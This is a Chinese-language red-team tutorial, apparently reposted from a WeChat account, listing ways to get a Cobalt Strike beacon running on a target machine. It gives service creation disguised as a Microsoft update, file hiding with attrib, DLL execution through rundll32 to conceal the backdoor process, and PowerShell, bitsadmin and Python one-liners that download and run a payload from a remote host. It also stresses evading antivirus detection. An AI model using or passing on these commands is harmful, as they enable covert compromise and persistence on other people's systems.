作为红队人员的一款重型武器——Cobaltstrike的常见上线方式和注意事项需要熟记于心。不同环境中的灵活应用可避免各种入坑,收藏该文章以备不时之需。
1. Windows Executable
点击Generate,生成一个exe文件,在目标机器运行此exe文件,即可上线。但该文件未经任何免杀处理,几乎现有杀毒软件都能第一时间查杀。
2. Windows服务马
虽然这也是一个exe文件,但是它需要通过服务来上线。
这需要现在目标机上先获取到system权限,然后在目标机器上创建服务。
创建服务的步骤如下:
1.sc create “Microsoft_updata” binPath= C:WindowsSystem32Microsoft_updata.exe//”Microsoft_updata“为服务名称 这里需要注意一点,binPath=[空格],等号后面需要接一个空格,并且P要大写。2.sc description "Microsoft_updata" "该文件用于更新微软信息"//设置服务的描述字符串(可选)3.sc start Microsoft_updata//目标机器开启服务即可上线4.sc delete Microsoft_666//若要删除服务时使用该命令
其实进行到这一步对于Windows系统来说已经具有很强的隐蔽和迷惑能力了,但是对于具有应急能力的工程师来说还是不够隐蔽。为了更加隐蔽,我们可以将该exe设置为隐藏文件,来降低后门的暴露性。
利用如下命令,将文件变为隐藏文件。
attrib +h service.exe //增加隐藏attrib -h service.exe //去掉隐藏
CS生成的木马具有较高的查杀率,所有拥有一定的免杀技能是必不可少的。
3. Windows DLL马
对于dll,可使用如下命令:
rundll32.exe 123.dll Startrundll32.exe用来执行32位或64位的dll文件,它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有 Rundll32.exe,而不会有DLL后门的进程,这样,就实现了进程上的隐藏。
我们可以使用如下命令查看rundll32.exe是否被注入:
wmic process where caption="rundll32.exe" get caption,commandline /value
如果dll注入到其他进程,我们就不可以利用wmic来查看,这时我们需要使用另外一条命令来进行查看 ::
tasklist /m 123.dll
注意:如果一个dll注入到系统进程中,不要去结束这个系统进程,否则系统会崩溃。
4. Powershell马
powershell是从Windows7才开始出现的,所以此脚本上线的方式,只对Windows7之后出现的Windows版本有效,Windows server的话是对2008及以后的版本有效。
选择好之后点击生成,CS会返回一串命令:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10:80/a'))"
此时需要在目标机器上运行此代码,即可上线成功。
对于目标机运行powershell存在限制的情况在此不做讨论。
5. bitsadmin马
和上一个操作过程一样,点击开始后会得到一串代码:
cmd.exe /c bitsadmin /transfer 61f0 http://10.10.10.10:80/a %APPDATA%61f0.exe&%APPDATA%61f0.exe&del %APPDATA%61f0.exe
运行结束即可成功上线。
6.Python马
利用Python脚本进行上线,多半是在linux环境中使用,但如果Windows目标机器中存在python环境,也可以使用。
点击开始后,在目标机上运行该命令。运行即可上线。
python -c "import urllib2; exec urllib2.urlopen('http://10.10.10.10:80/a/python').read();"感谢各位老铁关注!请随时关注公众号动态!
原文始发于微信公众号(虫子安全):Cobaltstrike上线方式及注意事项
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论